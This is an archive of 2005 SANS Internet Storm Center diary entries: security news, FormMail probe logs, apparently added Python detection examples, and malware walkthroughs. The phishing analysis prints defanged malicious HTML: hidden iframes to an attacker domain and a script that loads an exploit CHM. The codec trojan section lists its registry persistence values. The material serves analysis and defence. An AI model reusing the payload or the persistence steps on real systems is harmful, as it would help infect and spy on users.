phootrest - what your office PC is good for, after some n00b installs the latest P2P*ster client with all its parasitic attachments





Brian

iphrame - an inline frame used to insert malicious code (often obphuscated) into an html document

phool disclosure - the act of disclosing a supposed PoC exploit that is in reality an unrelated malicious piece of code which is easily identifiable

phree loader - marketer who wants phifteen minutes of phame phor coming up with another scary phword





Anonymous (but one bad dude)

phly phishing - "traditional" phishing over wireless

phear - what script kiddies pheel when I'm around

phud - the stuff AirMagnet is spreading with this thread

phunky - what Ed Skoudis is

phlame_war - what kiddies d'script do over mailing lists





Brian Krebs

phlaming - conducting a denial-of-service attack using angry insults written in all capital letters with lots of punctuation

philching - using technological trickery to steal

phlanking - the use of special exploits to get around a target's defenses

phorking - a Web-based exploit that directs the victim's browser to two locations simultaneously

phorcing - another Web-based exploit that sends a victim to a specific Web page no matter what other addresses they try to visit

phudging - the act of serving misleading online advertisements





Update: 12:23pm EDT - We've received lots and lots of submissions. Here is a sampling of ph-words. Thanks to all who submitted their suggestions. It wouldn't surprise me to see some of these words patented shortly:


Stephen Smoogen

phred - a person who uses ph words in conversation too much

phoo - a variable to be incremented when you play ph-bingo at the next security lecture

phree software - Spyware enabled software that is downloaded by an unwary user. This phree software then is used for pharming attacks

phirewall - a product aimed at stopping phishing attacks



Anonymous

Phraud - Using a computer as the primary mechanism to defraud



Skippy

phibbing - exaggerating or outright lying about the severity of a possible vulnerability to gain attention and clout; similar to FUD (phud) but used to refer to the market speak of the discoverer, not the pronouncements of a competitor





Brian King (categorized as "phacetious phabrications")

phubar - a zero day attack in which a computer bursts into phlames such that it is Phudged Up Beyond All Recognition.

phlaking - a network administrator's DoS caused by the previous night's drinking binge.

phudging - what the network admin does when his boss asks him why he is sleeping under his desk (see above).





Colin Keith

Phlattering/Phawning - A cross between 419 scam and a phishing scam where the victim is "buttered up" with a "In appreciation for being such a great customer please select which of the following prizes you'd like to win, oh and please enter your CC no/SSN for confirmation"

Pheeding - forcing data to become less random by force "pheeding" entropy sources.

B-Phrending - "Hey Bob, how's it going? I haven't seen you since [classmates.com search]th grade at [classmates.com search] school."





Alex

phlogging - what ought to happen to people that create marketing hype

phorking - a DoS attack where a number of processes are forked on a unix host... or a competition where several phorkers use forks to try to stab olives served on a platter





Dave

Phunny - As in Phunny Money, the kind offered in exchange for your bank details by those nice men in Nigeria.

Phramed - The usual defence offered by those nice men in Nigeria when they are arrested.

Phence - One involved in laundering the ill gotten gains of those nice men from Nigeria

Phriend - That nice man from Nigeria you've been exchanging e-mails with.

Phorehead - The thing that Homer Simpson slaps when he realises he's been taken in by those nice men from Nigeria.

Phaery - As in Phaery Tale, the story told by those nice men from Nigeria.

Phaeces - The stuff that hits the Phan when you use the company bank account to help those nice men from Nigeria.

Phan - The thing hit by the Phaeces when you..... Do I really have to type it out again?

Phacade - The show put on by TNMFN ( got fed up typing it )

Phigment - That big pile of cash in an African bank that TNMFN want you to help move.





Joe Traband

Phixing - Sending out viruses that pose as a patch








-Joshua Wright/handler-on-duty
Published: 2005-07-16

MS Advisory on the Vulnerability in RDP; Port 3389; FormMail Attempts

MS Advisory on the Vulnerability in RDP



Microsoft has released a security advisory on the vulnerability in Remote Desktop Protocol (RDP). Their initial investigation has confirmed the DoS vulnerability. Services that use RDP are not enabled by default, but Remote Desktop is enabled by default on Windows XP Media Center Edition.



The advisory has provided the following workarounds:


* Block TCP port 3389 at the firewall.

* Disable Terminal Services or the Remote Desktop feature if they are not required.

* Secure Remote Desktop Connections by using an IPsec policy.

* Secure Remote Desktop Connections by employing a Virtual Private Network (VPN) connection.



For more details, please refer to:

http://www.microsoft.com/technet/security/advisory/904797.mspx

Port 3389



Yesterday, we mentioned port 3389 in connection with the Windows 0-day exploit. Our reader, Joe, has detected some scans on this port. Looking at the port 3389 graph, there is also a spike in the last few days. If you have also experienced the same scan, please let us know.

http://isc.sans.org/port_details.php?port=3389

FormMail Attempts



One reader has detected several attempts on /cgi-bin/FormMail. The IP addresses came from a wide range of networks. From the logs submitted, these could be attempts from a botnet. If you have seen similar attempts, please send us a note.



80.xx.xx.xx - - [16/Jul/2005:14:54:57 +0200] "POST /cgi-bin/FormMail HTTP/1.1" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

12.xx.xx.xx - - [16/Jul/2005:14:54:58 +0200] "POST /cgi-bin/FormMail HTTP/1.1" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

63.xx.xx.xx - - [16/Jul/2005:14:55:03 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

200.xx.xx.xx - - [16/Jul/2005:14:55:05 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

200.xx.xx.xx - - [16/Jul/2005:14:55:08 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

80.xx.xx.xx - - [16/Jul/2005:14:55:11 +0200] "POST /cgi-bin/FormMail HTTP/1.1" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

210.xx.xx.xx - - [16/Jul/2005:14:55:15 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

61.xx.xx.xx - - [16/Jul/2005:14:55:21 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

203.xx.xx.xx - - [16/Jul/2005:14:55:31 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

213.xx.xx.xx - - [16/Jul/2005:14:55:30 +0200] "POST /cgi-bin/FormMail HTTP/1.1" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"
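What makes the excerpt above look like a botnet rather than one scanner is the combination of many unrelated source networks, the same User-Agent on every request, and all of it landing within about half a minute. The following is an added example (not the reader's script or anything from the diary) that parses Apache combined-format lines and summarizes POSTs to /cgi-bin/FormMail along exactly those three dimensions. The sample lines are constructed to mirror the shape and timing of the excerpt, using RFC 5737 documentation addresses in place of the masked ones; the thresholds in looks_distributed() are assumptions to tune for your own traffic.

```python
import re
from datetime import datetime, timedelta

# Apache "combined" log format, the layout of the lines submitted to the diary.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample (not the reader's actual logs): same timing and User-Agent
# as the diary excerpt, documentation addresses instead of the masked ones,
# plus one unrelated GET that must be ignored.
UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"
SAMPLE_LOG = "\n".join([
    f'192.0.2.10 - - [16/Jul/2005:14:54:57 +0200] "POST /cgi-bin/FormMail HTTP/1.1" 200 2460 "-" "{UA}"',
    f'198.51.100.7 - - [16/Jul/2005:14:54:58 +0200] "POST /cgi-bin/FormMail HTTP/1.1" 200 2460 "-" "{UA}"',
    f'203.0.113.44 - - [16/Jul/2005:14:55:03 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "{UA}"',
    f'203.0.113.45 - - [16/Jul/2005:14:55:05 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "{UA}"',
    f'192.0.2.77 - - [16/Jul/2005:14:55:11 +0200] "POST /cgi-bin/FormMail HTTP/1.1" 200 2460 "-" "{UA}"',
    f'198.51.100.9 - - [16/Jul/2005:14:55:31 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "{UA}"',
    '192.0.2.10 - - [16/Jul/2005:16:10:00 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
])


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def summarize_formmail_posts(log_text):
    """Collect every POST to /cgi-bin/FormMail (with or without .pl) and report
    how many distinct clients sent them, over what time span, and with how many
    different User-Agents."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith("/cgi-bin/FormMail"):
            hits.append(rec)
    if not hits:
        return None
    hits.sort(key=lambda r: r["ts"])
    return {
        "requests": len(hits),
        "distinct_ips": sorted({r["ip"] for r in hits}),
        "span_seconds": (hits[-1]["ts"] - hits[0]["ts"]).total_seconds(),
        "user_agents": sorted({r["ua"] for r in hits}),
    }


def looks_distributed(summary, min_ips=4, max_span=timedelta(minutes=2)):
    """Heuristic (thresholds are assumptions): many distinct sources hitting the
    same CGI inside a short window reads as coordinated, not as one scanner."""
    if summary is None:
        return False
    return (len(summary["distinct_ips"]) >= min_ips
            and summary["span_seconds"] <= max_span.total_seconds())


if __name__ == "__main__":
    s = summarize_formmail_posts(SAMPLE_LOG)
    print(s)
    print("distributed:", looks_distributed(s))
```

A single shared User-Agent across many sources is worth reporting on its own: FormMail abuse of this era was relaying spam through the script, so a 200 response to every POST also tells you the script answered rather than rejected the requests.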


Published: 2005-07-15

Windows 0 day exploit? ; Yet another trojan; .US resolution response; How to identify when your DNS is not poisoned; and a last minute query tcp port 7393

Windows 0 day exploit?


News of a 0-day exploit against Windows Remote Desktop this morning has been light on details. A remote DoS is possible and has been discussed on the Daily Dave mailing list. Remote Desktop is not enabled by default on Windows XP SP2 systems; however, the Terminal Services service is running in support of Remote Assistance and Fast User Switching. The server does not start a listener on port 3389 until a Remote Assistance request is sent. However, if you enable Remote Desktop, your system may be vulnerable.


I doubt that this is the last we are going to hear of this.


Update:


There is no known *PUBLIC* exploit code in the wild for this vulnerability. The author could release POC code but has chosen not to do so at this time.

More information here: http://www.securityfocus.com/bid/14259
and here: https://www.immunitysec.com/pipermail/dailydave/2005-July/002189.html




Yet another trojan




A reader sent us a packet (wahoo!) this morning containing some data from a nefarious web server. It contained some not-nice VBScript which dropped a trojan on the host as C:\windows\winini32.exe. The malicious VBScript file is called hta.txt. I am not sure what mechanism is used to distribute the link to the VBScript yet, but hope to find out soon. In the meantime, IDS triggers for showHelp() might lead you to this activity on your network.


.US DNS resolution response:




Here is the response from "NeuStar Registry Services" regarding inquiries into reported DNS resolution problems of the .us domain last week:


Here is a summary of what we were able to determine of last weeks .US
resolution incident that affected a handful of providers:


===========


- All .US (and .BIZ) sites were up and resolving queries for both BIZ
and US throughout the incident.


- Most service providers were not experiencing any difficulties. In
order to understand the incident, we are closely examining the
circumstances surrounding those providers that had difficulties.


-We did not observe any evidence of security breaches or hack/attack
attempts.


-Prior to finding a permanent fix, we cleared the problem for some
customers by instructing them to restart their upstream DNS service.


-The problem was fixed by performing a non-service-interrupting
software re-initialization of a network element at the San Jose.


-While we are monitoring this site at heightened levels, we do not
anticipate a recurrence of the issue.


-We had performed minor network maintenance in San Jose on Wednesday,
prior to, but not immediately before, the first customer call on
Wednesday night.


-We strongly suspect that the maintenance was a trigger event for the
incident and this is the primary focus area of our investigation.


-We are currently working closely with the vendor of the previously
mentioned network element to determine what led to this issue, and also
to determine why queries that hit this particular network element did
not round-robin to other DNS servers.


-There was no single point of failure in either the .BIZ or .US DNS.




How to identify when your DNS is not poisoned




One reader wrote in concerned that when he/she went to www.google.com their browser took them to www.sogo.com instead. They were rightly concerned that DNS was under attack. In this case, though, it was the browser trying to be helpful. For whatever reason, at that moment www.google.com was not reachable, so the client tried to go to www.google.com.net, which takes you to sogo.com. Thanks for trying to be a smarter browser.


Another update


I have been corresponding all day with a fellow who sees regular traffic at his home Internet connection (cable or DSL) on port 7393. A quick glance at http://isc.sans.org/port_details.php?port=7393 shows that there is some consistent traffic on this port. I have no clue what this port is for. I am guessing that it may be related to some P2P app. Google reveals nothing. The chap I am talking to cannot get packet captures for me, so I am at a loss. Anyone have any clues about TCP port 7393? Please let us know if you do. Thanks.


Hope you have a good weekend
Cheers Dan


dan - at - madjic dot net


Published: 2005-07-14

Update: New Windows XP SP2 vulnerability; MS Patches reports; Bad, Bad Spam...

Update: New Windows XP SP2 vulnerability



badpack3t announced the discovery of a so far unpatched vulnerability in Windows XP SP2. The vulnerability is due to a flaw in the remote desktop assistant. This service is NOT FIREWALLED in XP SP2's default firewall configuration.

badpack3t was able to cause a blue screen. However, there is a chance that
this could be used to execute code remotely.

RDP uses port 3389 TCP. In one MSFT , 3389 UDP is mentioned, but we could not verify that RDP listens on 3389 UDP.

Our sensors did see a slight increase in port 3389 TCP scanning starting about two weeks ago. The increase is small, and somewhat consistent with a small number of new scanners.

Other references to this issue:

http://secunia.com/advisories/16071/

https://www.immunitysec.com/pipermail/dailydave/2005-July/002185.html

MS Patches reports





Yesterday, Tom asked for reports about the MS July patches. Below is a summary of the reports received, plus some opinions about the W2k Security Rollup for SP4. Thank you to all who sent reports!






* Citrix problems with W2k security rollup patches.






A reader reported that "...After applying the update on two separate servers, authenticated users connecting to the servers through a Windows 2000 Server VPN connection are unable to run published applications. After removing the security rollup, full functionality is restored."

After some email exchange, we found that Citrix has made available a KB article about this: Document ID CTX107051. The reader said that he will try the workaround.






* Panda AV problems after the patches were applied.






A reader reported that "...After applying the patches, some components (either the firewall or protection against unknown threats) on Panda Platinum 2005 Internet Security (9.02.01) stopped working.

This happened on my Win2000 laptop (fully patched) and on several WinXP Pro boxes. The solution was to completely uninstall Panda & then re-install it."




* Problems with v6 downloading patches...






A reader reported that when visiting the Windows Update website, he was prompted to upgrade the Windows Update Agent. He did that, and afterwards he couldn't connect to any update server. The solution: "...I found that re-installing Microsoft XML parser 3.0 SP4 fixed the issue.
Going to v4.windowsupdate.microsoft.com generated an error, but provided the info on fixing this. This fix allowed for a reinstall of Windows Update Agent."







* Another reader reported a crash of explorer.exe when trying to view a video folder. It happened after he installed MS05-036.






Bad, Bad Phishing/Spam...









We received today a report of a PayPal phishing. While all the other links in the HTML went to PayPal, one didn't. That link is the one below:

http : //www.onlinepaymentspaypaleio[ SNIP ]we.[DOMAIN].org//Trants/Bin/kdejidiuehyguyuwdheoirejfrufhrfyrguf
rfgruhrfuherif/oudiheiudhedygdueydguwedyehdieudgwuydew/
doiejduhdiudhediwuedhwei.html



Quite a strange domain, huh? And what about an HTML file called doiejduhdiudhediwuedhwei.html?




::doiejduhdiudhediwuedhwei.html::


#html#




#body#



#iframe src="http : //www.i47324876348731[ SNIP ]45237463254734823746823467.biz" width=0 height=0 border=0##/iframe#



#/body#


#/html#



Another very interesting domain...

This would load the iframe from the domain above. The content of the index.html file is below:






::index.html::





#html#

#head#

#/head#

#body#

#iframe width=0 border=0 height=0 src="exploit.htm"##/iframe#

#iframe width=0 border=0 height=0 src="ani.html"##/iframe#

#iframe width=0 border=0 height=0 src="new/index.html"##/iframe#

#/body#

#/html#


More iframes...what a surprise...
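Both pages above use the same trick: an iframe with width=0 and height=0 that the victim never sees, pointing either off-site (the phishing page) or at local exploit files (index.html). The following is an added example, not code from the diary, that pulls exactly that pattern out of an HTML document with Python's standard html.parser, flagging iframes that are zero-sized or hidden with display:none and noting whether the src leaves the page's own host. The two sample documents are constructed to mirror the defanged pages above; the host names in them are placeholders, not the real domains.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class HiddenIframeFinder(HTMLParser):
    """Collect every <iframe>, recording whether it is effectively invisible
    (zero width/height or display:none) and whether its src is off-site."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        # html.parser lowercases attribute names; unquoted width=0 arrives as "0".
        a = {name: (value or "") for name, value in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (a.get("width", "").strip() == "0"
                  or a.get("height", "").strip() == "0"
                  or "display:none" in style)
        src = a.get("src", "")
        host = urlparse(src).hostname  # None for relative URLs such as exploit.htm
        self.findings.append({
            "src": src,
            "hidden": hidden,
            "offsite": host is not None and host.lower() != self.page_host,
        })


def find_hidden_iframes(html, page_host):
    """Return only the iframes a user would not see on the rendered page."""
    parser = HiddenIframeFinder(page_host)
    parser.feed(html)
    parser.close()
    return [f for f in parser.findings if f["hidden"]]


# Constructed samples modelled on the two pages in the diary (placeholder hosts).
PHISH_PAGE = """<html><body>
<iframe src="http://iframe-host.example/" width=0 height=0 border=0></iframe>
</body></html>"""

LANDING_PAGE = """<html><head></head><body>
<iframe width=0 border=0 height=0 src="exploit.htm"></iframe>
<iframe width=0 border=0 height=0 src="ani.html"></iframe>
<iframe width=0 border=0 height=0 src="new/index.html"></iframe>
<iframe src="http://www.example.org/player" width="300" height="200"></iframe>
</body></html>"""


if __name__ == "__main__":
    for name, doc, host in [("phish page", PHISH_PAGE, "phish-host.example"),
                            ("landing page", LANDING_PAGE, "iframe-host.example")]:
        for f in find_hidden_iframes(doc, host):
            print(f"{name}: hidden iframe -> {f['src']} (offsite={f['offsite']})")
```

Relative sources, as on the landing page, come back with offsite=False, which is correct: the exploit files were served from the same host, so a "hidden and off-site" rule alone would have missed them. A hidden iframe is a signal in its own right regardless of where it points.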

The content? (PS: I had to change some things below, because it was triggering some AV.)


#textarea id="code" style="display:none;"#
<object data="&#109;[SNIP]:[SNIP]!${PATH}/exploit.chm::/exploit.htm" type="text/x-scriptlet"##/object#

#/textarea#



#script language="javascript"#

document//write(code//value//replace(/\${PATH}/g,location//href//
substring(0,location//href//indexOf('exploit.htm'))));

#/script#


The new/index.html will try to download a file called loader.exe, a downloader trojan... :)



This loader.exe will try to download a file called f0001.exe.


This one will create the files:

* Creates file C:\WINDOWS\SYSTEM\winldra.exe.

* Creates file C:\WINDOWS\netdx.dat.

* Creates file C:\WINDOWS\dvpd.dll.

* Creates file C:\WINDOWS\TEMP\fe43e701.htm.

among other keys on Registry...



It will also open a backdoor on port 9125.

This kind of virus usually opens a proxy, ftp server and has capabilities of keyloggers...



Bad thing... as I write this, it is detected by only 3 of the 22 AV engines on VirusTotal...


___________________________________________________________________________

Handler on Duty: Pedro Bueno ( pbueno \#AT\# isc.sans.org )


Published: 2005-07-13

A question; New MSBA; Finding zlib; Evading Snort; Some Reading; FTBM VI: Hypnotized and EULAgized

A Question:



Anyone having problems with July MS patches? We’ve had scattered reports of issues. Let us know.

New Version of MBSA



Microsoft Baseline Security Analyzer (MBSA) 2.0 is available



Info: http://support.microsoft.com/?scid=kb;en-us;895660



Download: http://www.microsoft.com/technet/security/tools/mbsahome.mspx



Also, in case you missed it, there is new functionality that allows you to update other MS products (MS Office, etc...) using Windows Update. Check out the Windows Update web page for details:



http://windowsupdate.microsoft.com/



(Thanks Peter!)

Finding Vulnerable zlib Executables



When something like the recently announced zlib issues (http://isc.sans.org/diary.php?date=2005-07-10) becomes public, you’re always told that it is imperative to patch executables that have been statically linked with vulnerable versions of the library. But how the heck do you find them? In a really cool display of out-of-the-box thinking, Florian Weimer has come up with a way to put the open-source AV scanner ClamAV to work finding statically linked vulnerable versions of zlib.



http://www.enyo.de/fw/security/zlib-fingerprint/



(Thanks Erik)
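The idea behind Weimer's ClamAV signatures is that a statically linked zlib leaves recognizable bytes inside the executable. The following is an added example (my own, not Weimer's signatures or any ISC tool) that takes the simplest form of that idea: zlib's deflate.c and inflate.c each embed a copyright string carrying the library version, such as " inflate 1.2.2 Copyright 1995-2004 Mark Adler ", so a byte-level search for that string recovers the version without running anything. The sample "binaries" are constructed byte strings, and the 1.2.3 cut-off is an assumption for this example; take the real threshold from the advisory you are patching against. A string search will also miss binaries where the string was stripped, which is where a proper signature approach earns its keep.

```python
import re
from pathlib import Path

# zlib's deflate_copyright / inflate_copyright strings, e.g.
# " deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly " and
# " inflate 1.2.3 Copyright 1995-2005 Mark Adler ".
ZLIB_VERSION_RE = re.compile(rb"(deflate|inflate) (\d+\.\d+(?:\.\d+)?) Copyright")

# Assumption for this example: anything older than 1.2.3 is reported for review.
FIXED_VERSION = (1, 2, 3)


def version_tuple(text):
    """'1.2.2' -> (1, 2, 2) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def scan_bytes(data):
    """Return the set of zlib version strings embedded in a file's bytes."""
    return {m.group(2).decode("ascii") for m in ZLIB_VERSION_RE.finditer(data)}


def needs_review(data, fixed=FIXED_VERSION):
    """True if a zlib older than `fixed` is visible in the file's bytes."""
    return any(version_tuple(v) < fixed for v in scan_bytes(data))


def scan_tree(root, fixed=FIXED_VERSION):
    """Walk a directory tree; return {path: [versions]} for files needing review."""
    findings = {}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            data = path.read_bytes()
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        if needs_review(data, fixed):
            findings[str(path)] = sorted(scan_bytes(data))
    return findings


# Constructed stand-ins for real executables (not actual binaries).
OLD_BINARY = b"\x7fELF\x02\x01\x01\x00 inflate 1.2.2 Copyright 1995-2004 Mark Adler \x00"
NEW_BINARY = b"\x7fELF\x02\x01\x01\x00 deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly \x00"
NO_ZLIB = b"\x7fELF\x02\x01\x01\x00hello world\x00"


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, versions in scan_tree(root).items():
        print(f"{path}: zlib {', '.join(versions)}")
```

Run it as `python zlibscan.py /usr/local/bin` (script name assumed) to list candidates. Dynamically linked programs will not match, because the string lives in libz.so rather than in the executable; those are fixed by updating the shared library, which is the easy case the diary's advice is not about.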

Possible Evasion in Snort Multi-Pattern Algorithm



There appears to be a problem with the default multi-pattern matching algorithm in the current release version of Snort that could allow attackers to evade detection. The suggested workaround (until Snort 2.4, with a different multi-pattern algorithm, becomes available) is to update your Snort configuration with:



config detection: search-method ac




(Thanks Bill)

Interesting Reading:



ICANN Suggestions to Protect Your Domain



ICANN's Security and Stability Advisory Committee has outlined several famous and recent thefts of websites, including Panix.com, Hushmail.com and HZ.com, and listed where the system went wrong and what can be done to correct the flaws. It has made 10 findings and, in response, 10 recommendations for how the internet industry and consumers themselves can make sure that people don't steal their online property.



http://www.icann.org/announcements/hijacking-report-12jul05.pdf



(Thanks, Pat!)

Mules: The Other End of the Phishing Line



Every day, we play whack-a-mole with phishers, Trojans, and scams. This story from USA Today talks about what goes on at the far end of the phishing line from what we see. Interesting stuff.



http://www.usatoday.com/money/industries/technology/2005-07-10-cyber-mules-cover_x.htm

Follow the Bouncing Malware VI: Hypnotized and EULAgized



Prelude



Before we begin this lil’ walk on the wild side, I want to make sure we get some things straight right up front:



1) We’re going to be talking about the seamier side of the Internet today, including sites which specialize in displaying photos and videos of poverty-stricken, 20-something men and women who obviously can’t afford clothing. Oftentimes, these young men and women seem to be more than a bit "chummy" with each other as well. If you are offended by such things, please be assured that I will put forth my usual effort to maintain the dignity and decorum of the Handler’s Diary, which is to say "none." Muddle through with us anyway, and you’ll probably find that there is far more here to reinforce your disappointment in humanity than a few "candid" photos.



2) Praise, kudos, and large-denomination currency can be directed to me. Vitriolic complaints should be directed to my fellow handler, Cory Altheide (caltheide at isc.sans.org), who, this past February 2nd, used this space for a literary depiction of me standing in for Punxsutawney Phil, the world famous groundhog.



Why yes, I do hold a grudge.



3) Sweetheart... when you caught me looking at "those" sites, I really *was* doing research... see? Hello? Hello?

The Set-Up



It was a dark and stormy night (sorry, I always wanted to start a story that way...) and Joe Sixpack, our intrepid hero, was browsing the ‘net, looking for something that, in the interest of decorum and not setting off "nanny filters," I can’t mention. Let’s just say that it sounds a lot like the word "thorn," and leave it at that.



Joe was looking for something different. Not wildly different, mind you—nothing on the order of... uh... let’s say "animal husbandry," but something more than just the regular old... umm... anatomical studies. Joe wanted some *action*. Perhaps if he could find some video footage of legal-aged (for while Joe may be a pervert, he has some standards...) ladies and gentlemen... er... consummating their acquaintance, that would be good.



The Round-Up



Like most of your average, everyday letches, Joe heads on over to Google and does a bit o’ searching. If it’s worth finding on the Internet (and even if it ain’t), Google is the place to go. If you’ve never searched for a... uh... "thorn-related" word on Google, you’ll be awfully surprised at the sheer volume of responses that you receive. One time, I was legitimately searching for a specific type of those small, threaded fasteners... let’s just say that it was a bit difficult to separate a tiny amount of wheat from a big ol’ truck-load of chaff. But, I digress...



In any case, a little bit of searching leads Joe to an appropriate, inappropriate site.

The Hook



"Yes!" Joe says silently, as he peruses the listing of the various forms of "entertainment" that his new-found site has to offer.



What a selection it is: photos and videos of all kinds of things-- things that Joe has never even heard of. Things that would make a longshoreman blush. Men, women, birds, beasts, and devices in combinations and permutations that make an episode of Jerry Springer look like a church picnic.



Joe is in his element. He scrolls up and down the screen, looking at the listing and seeing all kinds of stuff he wants to check out. Finally, he can’t help but click on a link to one of the steamier video feeds.

The Double-Cross



But instead of watching his screen fill with undulating bodies, Joe is disappointed when the following message pops up:



"To play new format video files correctly you need to download free video codec
update (9Kb) Click here. Free codecs provided by www.vcodec.com"



(Note: Standard "Follow the Bouncing Malware" rules apply here. The link above is non-clickable for a reason: you really, REALLY shouldn’t go there. I may joke around about a lot of stuff, but not that. Don’t do it.)



Joe, being Joe, has heard something about "codecs" before. He vaguely recalls something about them being used in Windows Media Player. He is actually pretty proud of himself when he remembers that the name "codec" is a portmanteau word created from the two functions that a codec serves: COmpression and DECompression. Maybe he’s finally getting the hang of this computer stuff after all.

The Tale



Joe surfs to the VCodec site and is pleased when he sees a whole lot of information that, although he doesn’t understand it all, seems to confirm what he remembered. Yes, this "codec" thingie has something to do with compressed video.



"VCodec 1.47 FREE - New revolutionary video standard



VCodec includes a suite of powerful encoding tools enabling the highest levels of visual quality, compression and control. It plugs into your video software to produce high-quality movies (at one-tenth the size of a DVD) for viewing on your PC."

The Wire



Following that was an impressive list of "Technical Specifications" filled with technical-sounding words like "Integrated Encoding Tools," "Bitrates," "Quantization," "De-interlacing" and something called "block motion compensation." It all sounded way too technical, but if he needed it to see what he needed to see, well, then, he needed it. (Say that ten times fast...) Besides, the site was very impressive and very professional looking. What could go wrong?



The Shut-Out



Joe was about ready to download the file, but there was something nagging at the back of his thoughts. Just before he clicked on the download link, it finally dawned on him: something is wrong. Back on the web page of his newest favorite site, there was a link that had said something about a "NEW updated version 3.5," and here, the VCodec site was only offering him version 1.47. What was going on?



He hadn’t clicked on the download link on that page, because he had heard that these... uh... "thornography" sites weren’t always on the up-and-up. But now, his curiosity was piqued.



Joe quickly clicked back to the video smorgasbord and carefully examined the direct download link found there. With a jaundiced eye, he looked carefully at what was displayed by his browser to make sure that the link was actually taking him to the VCodec site. It was! Ha! They weren’t going to fool him. He was going to download the new, updated version of the codec. Version 3.5 had to be way better than version 1.47.

The Sting



Joe downloaded the file and installed it. It was all very professional. First, a window popped up, explaining that the executable was going to install the VCodec software, and giving him the option to cancel the installation. Then, he was presented with one of those End User License Agreements (EULA) and was forced to agree with it if he wanted to install the software. Joe always hated that, but he did it anyway... he sort of felt hypnotized by the thought of what he would be seeing when that DVD quality video was dancing across his screen...

The Big Con



The file that Joe downloaded was "vc3_05b.exe," a 16,373 byte long executable. On the VCodec site, there is also a file called "vc1_05a.exe" (9341 bytes) which is what you get if you follow the main "download" link on the VCodec site. Also, like an extra surprise, hidden on the vcodec.com index page is some JavaScript that attempts, in several ways, to download the file "vc105a.htm" which is simply a copy of vc1_05a.exe. Both files are packed with the executable compressor FSG, and while they are superficially different, running either of them has the same result: version 3.5 just has a dog-and-pony show to go along with it.



Perhaps by now, you’ve gotten the idea that we’re not dealing with a plain old video codec here. After all, this *is* another installment of "Follow the Bouncing Malware." Well, no, it isn’t just a codec.



In fact, it isn’t a codec at all.



FSG, although it is a pain in the backside, isn’t really too much of an obstacle if you know what you’re doing. Un-packing vc3_05b.exe takes a little doing, but when you finally crack it open, it reveals plenty. Our buddy vc3_05b.exe has precious little to do with video compression, and much more to do with dropping an executable "gift" on your computer and then messing with the registry to automatically run it.



It adds two keys to the registry:



HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run



It adds the following values:



HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\uuid: "8dffcee8-49e4-443d-8606-b0502d81421f"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run\notepad.exe: "msmsgs.exe"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegSvr32: "C:\WINDOWS\System32\msmsgs.exe"



It modifies these values:



HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell:
"Explorer.exe" becomes

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell:
"Explorer.exe, msmsgs.exe"



Finally (if you’re following closely, you’ve seen this one coming), it drops the file:



C:\WINDOWS\System32\msmsgs.exe



